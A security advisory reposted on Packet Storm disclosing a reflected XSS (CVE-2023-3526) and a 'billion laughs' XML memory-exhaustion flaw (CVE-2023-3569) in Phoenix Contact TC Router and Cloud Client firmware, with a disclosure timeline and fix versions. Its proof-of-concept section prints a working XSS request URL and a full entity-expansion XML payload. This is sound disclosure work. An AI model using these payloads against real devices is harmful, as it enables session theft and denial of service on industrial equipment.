exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Phoenix Contact TC Cloud / TC Router 2.x XSS / Memory Consumption

Phoenix Contact TC Cloud / TC Router 2.x XSS / Memory Consumption
Posted Aug 14, 2023
Authored by T. Weber, S. Stockinger, A. Resanovic, T. Etzenberger | Site cyberdanube.com

Phoenix Contact TC Router 3002T-4G* versions prior to 2.0.2, TC Cloud Client 1002-4G* versions prior to 2.07.2, and Cloud Client 1101T-TX/TX versions prior to 2.06.10 suffer from cross site scripting and memory consumption vulnerabilities.

tags | exploit, denial of service, vulnerability, xss
advisories | CVE-2023-3526, CVE-2023-3569
SHA-256 | a587bb9bbd0a7bc6b304a09099ebed341f33e4b48fa43bcad73ec180522c55d2

Phoenix Contact TC Cloud / TC Router 2.x XSS / Memory Consumption

Change Mirror Download
St. Pölten UAS
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| Phoenix Contact TC Cloud Client 1002-4G*,
| TC Router 3002T-4G, Cloud Client 1101T-TX/TX
vulnerable version| <2.07.2, <2.07.2, <2.06.10
fixed version| 2.07.2, 2.07.2, 2.06.10
CVE number| CVE-2023-3526, CVE-2023-3569
impact| Medium
homepage| https://www.phoenixcontact.com/
found| 2023-05-04
by| A. Resanovic, S. Stockinger, T. Etzenberger
| This vulnerability was discovery during research at
| St. Pölten UAS, supported and coordinated by CyberDanube.
|
| https://fhstp.ac.at | https://cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"At Phoenix Contact, our approach is innovative, sustainable, and based on
partnership. This applies to how we deal with employees as well as with our
customers. We are also conscious of our social and environmental responsibility
and we act accordingly. With the vision of the All Electric Society, we also
want to empower our customers to act more sustainably by enabling the
comprehensive electrification, networking, and automation of all sectors of the
economy and infrastructure with our products and solutions."

Source: https://www.phoenixcontact.com/en-us/ueber-uns


Vulnerable versions
-------------------------------------------------------------------------------
TC Router 3002T-4G* / <2.0.2
TC Cloud Client 1002-4G* / <2.07.2
Cloud Client 1101T-TX/TX / <2.06.10

Vulnerability overview
-------------------------------------------------------------------------------
1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
A reflected cross-site scripting vulnerability can be triggerd in the license
viewer of the device. This can be used to execute malicious code in the context
of a user's browser. Cookies may be also stoled via this way.

2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569
By abusing the configuration file upload functionality of the device, it is
possible to slow down all other processes.

Proof of Concept
-------------------------------------------------------------------------------
1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
The reflected cross-site scripting vulnerability can be triggered by using the
following GET request:
https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15"><script>alert("document.cookie")</script>

2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569
The following configuration file can be used to exploit the binary
"/usr/bin/xmlconfig", which supportes entity reference nodes:
===============================================================================
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2
"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3
"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4
"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5
"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6
"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7
"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8
"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9
"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
===============================================================================

The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution
-------------------------------------------------------------------------------
Update to the latest available firmware version.

Workaround
-------------------------------------------------------------------------------
None.


Recommendation
-------------------------------------------------------------------------------
Phoenix Contact customers are advised to upgrade the firware to the latest
available version.


Contact Timeline
-------------------------------------------------------------------------------
2023-05-16: Contacting vendor via psirt@phoenixcontact.com
2023-05-17: Vendor informed internal product team.
2023-05-18: Added responsible disclosure policy from St. Poelten UAS.
2023-05-19: Vendor needs more time to fix the issues.
2023-06-15: Vendor asked for an explaination of the issues as he cannot
reproduce them; Sent screenshots and more PoCs to the vendor.
Offered an MS Teams call to clarify the issues.
2023-06-16: Scheduled a call for 2023-06-19.
2023-06-19: Clarified issues and further timeline for the coordination.
Vendor proposed to release the firmware on 2023-07-13.
2023-07-04: Contact stated that he has to shift the release after July. It
will be released on 08.08.2023; Confirmed the date.
2023-07-13: Received CVE numbers from vendor.
2023-07-18: Received firmware versions from vendor.
2023-07-23:_Vendor released firmwares.
2023-08-08: Coordinated release of security advisory.

Web: https://www.fhstp.ac.at/
Twitter: https://twitter.com/fh_stpoelten
Mail: mis at fhstp dot ac dot at

EOF T. Weber / @2023


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close